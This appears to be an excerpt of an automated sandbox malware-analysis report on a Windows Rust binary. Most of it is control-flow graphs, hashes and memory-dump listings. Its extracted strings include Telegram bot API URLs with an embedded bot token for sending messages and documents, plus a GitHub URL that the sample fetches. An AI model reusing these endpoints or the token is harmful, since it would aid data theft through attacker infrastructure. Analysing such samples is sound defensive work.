                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                            • String ID:
                                            • API String ID: 649803965-0
                                            • Opcode ID: c6eee0f1610aa0ab9b516e8a260dc4f2d989ee27d4750ea3dbb5c154f773677c
                                            • Instruction ID: b39128c3382303a9d89dd3f401debf1a2fe17767e6db1b602cf6c01e839352cb
                                            • Opcode Fuzzy Hash: c6eee0f1610aa0ab9b516e8a260dc4f2d989ee27d4750ea3dbb5c154f773677c
                                            • Instruction Fuzzy Hash: 62815635A0964686FF64AF56E8F077923A1AF45B80F5C40B9CD4DF73A5CE2EE8449300

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLast$HandleInformationSocketbindclosesocket
                                            • String ID:
                                            • API String ID: 3498260714-0
                                            • Opcode ID: 340aa9f8c848fca64b64136624f04a4048f236b6e001f52065e30287af9c7376
                                            • Instruction ID: b46834354a9a25d1fcff253f8df92da2c570d04cf25f9de2df66427f28554078
                                            • Opcode Fuzzy Hash: 340aa9f8c848fca64b64136624f04a4048f236b6e001f52065e30287af9c7376
                                            • Instruction Fuzzy Hash: FF413861F0825147FB21DE3985A5B7D22909F44BA4F1C9271DE5CE77C6EEBCA8C28700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: CloseErrorHandleStatus
                                            • String ID: AfdGroupcp$afd_group
                                            • API String ID: 556443930-836908229
                                            • Opcode ID: b4cffa2d3a0519832b86c450cfc019da9a9beaefc96f2c78e13bef1385c8a2f1
                                            • Instruction ID: a8836c9546c1b1bd5a4df1dcd5e041a77e42afcbdcefd9935bea556f3887011f
                                            • Opcode Fuzzy Hash: b4cffa2d3a0519832b86c450cfc019da9a9beaefc96f2c78e13bef1385c8a2f1
                                            • Instruction Fuzzy Hash: 5881B47260CB9582EB209F15E4A03AA77B0FF84794F084175EA8D977A9DF3CE155CB00
                                            APIs
                                              • Part of subcall function 00007FF6544F56B0: TlsGetValue.KERNEL32(?,?,?,?,00007FF654519CCA), ref: 00007FF6544F56C7
                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF65451A11A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressSingleValueWake
                                            • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$main
                                            • API String ID: 741412973-3691618705
                                            • Opcode ID: 7023d673c98ff0e9a3bc7b44dcc13488e72f0958903a33798dbd54181d792539
                                            • Instruction ID: d00b705fb34fd40b4dfdf4d79d7c05582703cd64c763740490a67931beb874df
                                            • Opcode Fuzzy Hash: 7023d673c98ff0e9a3bc7b44dcc13488e72f0958903a33798dbd54181d792539
                                            • Instruction Fuzzy Hash: 43229F22A09B8289FB12CF60D8A03BC37A4FB45748F5C55B5DA8DA2795EF3CE544D340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: CompletionCreateInfoPortSystem
                                            • String ID: Failed building the Runtime
                                            • API String ID: 463844942-401006096
                                            • Opcode ID: dc7883cb7fb5deed0a96c581318db998b5aaedc2326bbe97ef11cd5ef6a84700
                                            • Instruction ID: ebcafda5d3e81deeb7d375b8cb2aba8e32149e2312182cebb1284024f45cde17
                                            • Opcode Fuzzy Hash: dc7883cb7fb5deed0a96c581318db998b5aaedc2326bbe97ef11cd5ef6a84700
                                            • Instruction Fuzzy Hash: 90316E3250CBC286EB758B11E4903EA7368FF85340F4841B6E69D53BA9EF2CD249C740

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1484 7ff6543ace05-7ff6543ace0a 1485 7ff6543af027-7ff6543af056 call 7ff6543a3990 1484->1485 1487 7ff6543af05b-7ff6543af09c memcpy 1485->1487 1489 7ff6543af0d0-7ff6543af210 call 7ff654397c50 call 7ff6545160d0 1487->1489 1490 7ff6543af09e-7ff6543af0ba call 7ff654396ea0 1487->1490 1503 7ff6543b2952-7ff6543b2961 call 7ff6543b57c0 1489->1503 1504 7ff6543af216-7ff6543af49a call 7ff65440e180 HeapFree call 7ff6543b5de0 memcpy call 7ff65440f810 call 7ff654410e70 call 7ff6543a16b0 call 7ff6543b5de0 memcpy 1489->1504 1495 7ff6543af0c8 1490->1495 1496 7ff6543af0bc-7ff6543af0c3 call 7ff65439b750 1490->1496 1495->1489 1496->1495 1509 7ff6543b5245 1503->1509 1523 7ff6543af4b2-7ff6543af4ba 1504->1523 1524 7ff6543af49c-7ff6543af4ad HeapFree 1504->1524 1525 7ff6543af4c0 1523->1525 1526 7ff6543af564-7ff6543af5a3 call 7ff6543e4dd0 call 7ff6545160d0 1523->1526 1524->1523 1528 7ff6543af672-7ff6543af6e6 memcpy call 7ff65449c6a0 memcpy * 2 1525->1528 1541 7ff6543b2b22-7ff6543b2b31 call 7ff6543b5820 1526->1541 1542 7ff6543af5a9-7ff6543af5f5 call 7ff6545160d0 1526->1542 1533 7ff6543acf93-7ff6543acfa3 call 7ff654495c20 1528->1533 1534 7ff6543af6ec-7ff6543af706 1528->1534 1540 7ff6543acfa8-7ff6543acfbe 1533->1540 1536 7ff6543af70c-7ff6543af94e memcpy call 7ff654396ea0 call 7ff6545160d0 1534->1536 1561 7ff6543af950-7ff6543af95c call 7ff65439b750 1536->1561 1562 7ff6543af961-7ff6543af96b 1536->1562 1540->1534 1540->1536 1541->1509 1551 7ff6543b2b36-7ff6543b2b45 call 7ff6543b5820 1542->1551 1552 7ff6543af5fb-7ff6543af66a call 7ff654392730 1542->1552 1551->1509 1552->1528 1561->1562 1564 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 1562->1564 1565 7ff6543af96d-7ff6543af97a HeapFree 1562->1565 1573 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 1564->1573 1574 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 1564->1574 1565->1564 1579 7ff6543afa35 1573->1579 1580 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 1573->1580 1586 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 1574->1586 1587 7ff6543afb38-7ff6543afb40 call 7ff654397360 1574->1587 1579->1574 1580->1579 1596 7ff6543afbdf-7ff6543afbed HeapFree 1586->1596 1597 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 1586->1597 1587->1586 1596->1597 1606 7ff6543b0062-7ff6543b006a call 7ff654397360 1597->1606 1607 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 1597->1607 1606->1607 1614 7ff6543b0139-7ff6543b198d call 7ff654514af0 1607->1614 1615 7ff6543b011a-7ff6543b0133 memcmp 1607->1615 1619 7ff6543b19a0-7ff6543b19b7 1614->1619 1620 7ff6543b198f-7ff6543b199b HeapFree 1614->1620 1615->1614 1621 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 1619->1621 1622 7ff6543b19ca-7ff6543b19d6 1619->1622 1620->1619 1621->1622 1622->1565 1624 7ff6543b19dc 1622->1624 1624->1564
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: V$https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$nown$tv$xi$j
                                            • API String ID: 1887603139-3382795902
                                            • Opcode ID: c06a56636c1cd20b4eb67e17232519e4d2f2f2ad2c682ae2e3aa7c4a6274b8f7
                                            • Instruction ID: 242011a6d190142fea8f02af34e74c52a77b3371c36d72fc283d5fb0e30f7c01
                                            • Opcode Fuzzy Hash: c06a56636c1cd20b4eb67e17232519e4d2f2f2ad2c682ae2e3aa7c4a6274b8f7
                                            • Instruction Fuzzy Hash: F2427B32A08BC681EB60DB12E4943EE77A4FB85784F484175DA8DA3BA9DF3DD149C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2134 7ff6543af4ff-7ff6543af55e call 7ff6543967d0 memcpy 2137 7ff6543af564-7ff6543af5a3 call 7ff6543e4dd0 call 7ff6545160d0 2134->2137 2138 7ff6543af672-7ff6543af6e6 memcpy call 7ff65449c6a0 memcpy * 2 2134->2138 2154 7ff6543b2b22-7ff6543b2b31 call 7ff6543b5820 2137->2154 2155 7ff6543af5a9-7ff6543af5f5 call 7ff6545160d0 2137->2155 2143 7ff6543acf93-7ff6543acfa3 call 7ff654495c20 2138->2143 2144 7ff6543af6ec-7ff6543af706 2138->2144 2150 7ff6543acfa8-7ff6543acfbe 2143->2150 2146 7ff6543af70c-7ff6543af94e memcpy call 7ff654396ea0 call 7ff6545160d0 2144->2146 2173 7ff6543af950-7ff6543af95c call 7ff65439b750 2146->2173 2174 7ff6543af961-7ff6543af96b 2146->2174 2150->2144 2150->2146 2162 7ff6543b5245 2154->2162 2164 7ff6543b2b36-7ff6543b2b45 call 7ff6543b5820 2155->2164 2165 7ff6543af5fb-7ff6543af66a call 7ff654392730 2155->2165 2164->2162 2165->2138 2173->2174 2176 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 2174->2176 2177 7ff6543af96d-7ff6543af97a HeapFree 2174->2177 2185 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 2176->2185 2186 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 2176->2186 2177->2176 2191 7ff6543afa35 2185->2191 2192 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 2185->2192 2198 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 2186->2198 2199 7ff6543afb38-7ff6543afb40 call 7ff654397360 2186->2199 2191->2186 2192->2191 2208 7ff6543afbdf-7ff6543afbed HeapFree 2198->2208 2209 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 2198->2209 2199->2198 2208->2209 2218 7ff6543b0062-7ff6543b006a call 7ff654397360 2209->2218 2219 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 2209->2219 2218->2219 2226 7ff6543b0139-7ff6543b198d call 7ff654514af0 2219->2226 2227 7ff6543b011a-7ff6543b0133 memcmp 2219->2227 2231 7ff6543b19a0-7ff6543b19b7 2226->2231 2232 7ff6543b198f-7ff6543b199b HeapFree 2226->2232 2227->2226 2233 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 2231->2233 2234 7ff6543b19ca-7ff6543b19d6 2231->2234 2232->2231 2233->2234 2234->2177 2236 7ff6543b19dc 2234->2236 2236->2176
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: Content-Typeapplication/jsonsrc\tg.rs$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$tv
                                            • API String ID: 4250714341-1145926978
                                            • Opcode ID: c40a44a0881c54acee338dfd9f958b3d3c2c8895f490260e949a236aaecdac7f
                                            • Instruction ID: 5ed4e72ff43a674414fb386c5333e4132255da26a517f00be886ed1ac08975a6
                                            • Opcode Fuzzy Hash: c40a44a0881c54acee338dfd9f958b3d3c2c8895f490260e949a236aaecdac7f
                                            • Instruction Fuzzy Hash: 68126C22A0CBC681EB70DB16E0947EE67A4FB85784F484175DA8CA3BA9DF3DE545C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2618 7ff6543af896-7ff6543af8b2 2619 7ff6543af8b8-7ff6543af8bb 2618->2619 2620 7ff6543b198a-7ff6543b198d 2618->2620 2621 7ff6543af8ce-7ff6543af94e call 7ff6545160d0 * 2 2619->2621 2622 7ff6543af8bd-7ff6543af8c9 HeapFree 2619->2622 2623 7ff6543b19a0-7ff6543b19b7 2620->2623 2624 7ff6543b198f-7ff6543b199b HeapFree 2620->2624 2643 7ff6543af950-7ff6543af95c call 7ff65439b750 2621->2643 2644 7ff6543af961-7ff6543af96b 2621->2644 2622->2621 2626 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 2623->2626 2627 7ff6543b19ca-7ff6543b19d6 2623->2627 2624->2623 2626->2627 2630 7ff6543b19dc 2627->2630 2631 7ff6543af96d-7ff6543af97a HeapFree 2627->2631 2633 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 2630->2633 2631->2633 2648 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 2633->2648 2649 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 2633->2649 2643->2644 2644->2631 2644->2633 2654 7ff6543afa35 2648->2654 2655 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 2648->2655 2661 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 2649->2661 2662 7ff6543afb38-7ff6543afb40 call 7ff654397360 2649->2662 2654->2649 2655->2654 2671 7ff6543afbdf-7ff6543afbed HeapFree 2661->2671 2672 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 2661->2672 2662->2661 2671->2672 2681 7ff6543b0062-7ff6543b006a call 7ff654397360 2672->2681 2682 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 2672->2682 2681->2682 2689 7ff6543b0139-7ff6543b01ec call 7ff654514af0 2682->2689 2690 7ff6543b011a-7ff6543b0133 memcmp 2682->2690 2689->2620 2690->2689
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$iled${"ok":tr
                                            • API String ID: 4250714341-527331538
                                            • Opcode ID: 9714cc877ab62d098c09863793d3c5ebcf73ead4b0bcdf23ba67ef613c1a00d1
                                            • Instruction ID: 1a9f1de558e524c020048a2a71daa1cf1ea9978b1b50a4308eb9fa8410ee2b6a
                                            • Opcode Fuzzy Hash: 9714cc877ab62d098c09863793d3c5ebcf73ead4b0bcdf23ba67ef613c1a00d1
                                            • Instruction Fuzzy Hash: 99F1C132A08BC681EB60DB16E0A43EE77A4FB85B84F494176DA8CA37A5DF3DD545C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2693 7ff6543acf77-7ff6543acf8d 2694 7ff6543acf93-7ff6543acfa3 call 7ff654495c20 2693->2694 2695 7ff6543af6ec-7ff6543af706 2693->2695 2699 7ff6543acfa8-7ff6543acfbe 2694->2699 2696 7ff6543af70c-7ff6543af94e memcpy call 7ff654396ea0 call 7ff6545160d0 2695->2696 2708 7ff6543af950-7ff6543af95c call 7ff65439b750 2696->2708 2709 7ff6543af961-7ff6543af96b 2696->2709 2699->2695 2699->2696 2708->2709 2711 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 2709->2711 2712 7ff6543af96d-7ff6543af97a HeapFree 2709->2712 2720 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 2711->2720 2721 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 2711->2721 2712->2711 2726 7ff6543afa35 2720->2726 2727 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 2720->2727 2733 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 2721->2733 2734 7ff6543afb38-7ff6543afb40 call 7ff654397360 2721->2734 2726->2721 2727->2726 2743 7ff6543afbdf-7ff6543afbed HeapFree 2733->2743 2744 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 2733->2744 2734->2733 2743->2744 2753 7ff6543b0062-7ff6543b006a call 7ff654397360 2744->2753 2754 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 2744->2754 2753->2754 2761 7ff6543b0139-7ff6543b198d call 7ff654514af0 2754->2761 2762 7ff6543b011a-7ff6543b0133 memcmp 2754->2762 2766 7ff6543b19a0-7ff6543b19b7 2761->2766 2767 7ff6543b198f-7ff6543b199b HeapFree 2761->2767 2762->2761 2768 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 2766->2768 2769 7ff6543b19ca-7ff6543b19d6 2766->2769 2767->2766 2768->2769 2769->2712 2771 7ff6543b19dc 2769->2771 2771->2711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$I'
                                            • API String ID: 4250714341-4047316877
                                            • Opcode ID: 53f49c2ea65eaf884d2645ad0999020e54b9fa1a15aa293e036cc34dd15dc288
                                            • Instruction ID: 293fade0b9eee7c46301eca9a00f56221730d114c5bce1119555c2ff875b8885
                                            • Opcode Fuzzy Hash: 53f49c2ea65eaf884d2645ad0999020e54b9fa1a15aa293e036cc34dd15dc288
                                            • Instruction Fuzzy Hash: C8F1AE32A08BC681EB60DB16E0947EE77A4FB85B84F484175DA8CA37A9DF3DD545C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2772 7ff6543acfcd-7ff6543af82e call 7ff6543a18f0 2778 7ff6543af830-7ff6543af838 call 7ff654397360 2772->2778 2779 7ff6543af84b-7ff6543af878 call 7ff6545160d0 2772->2779 2778->2779 2785 7ff6543af87e-7ff6543af94e 2779->2785 2786 7ff6543b2a27-7ff6543b5245 call 7ff6543b5820 2779->2786 2792 7ff6543af950-7ff6543af95c call 7ff65439b750 2785->2792 2793 7ff6543af961-7ff6543af96b 2785->2793 2792->2793 2795 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 2793->2795 2796 7ff6543af96d-7ff6543af97a HeapFree 2793->2796 2804 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 2795->2804 2805 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 2795->2805 2796->2795 2810 7ff6543afa35 2804->2810 2811 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 2804->2811 2817 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 2805->2817 2818 7ff6543afb38-7ff6543afb40 call 7ff654397360 2805->2818 2810->2805 2811->2810 2827 7ff6543afbdf-7ff6543afbed HeapFree 2817->2827 2828 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 2817->2828 2818->2817 2827->2828 2837 7ff6543b0062-7ff6543b006a call 7ff654397360 2828->2837 2838 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 2828->2838 2837->2838 2845 7ff6543b0139-7ff6543b198d call 7ff654514af0 2838->2845 2846 7ff6543b011a-7ff6543b0133 memcmp 2838->2846 2850 7ff6543b19a0-7ff6543b19b7 2845->2850 2851 7ff6543b198f-7ff6543b199b HeapFree 2845->2851 2846->2845 2852 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 2850->2852 2853 7ff6543b19ca-7ff6543b19d6 2850->2853 2851->2850 2852->2853 2853->2796 2855 7ff6543b19dc 2853->2855 2855->2795
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
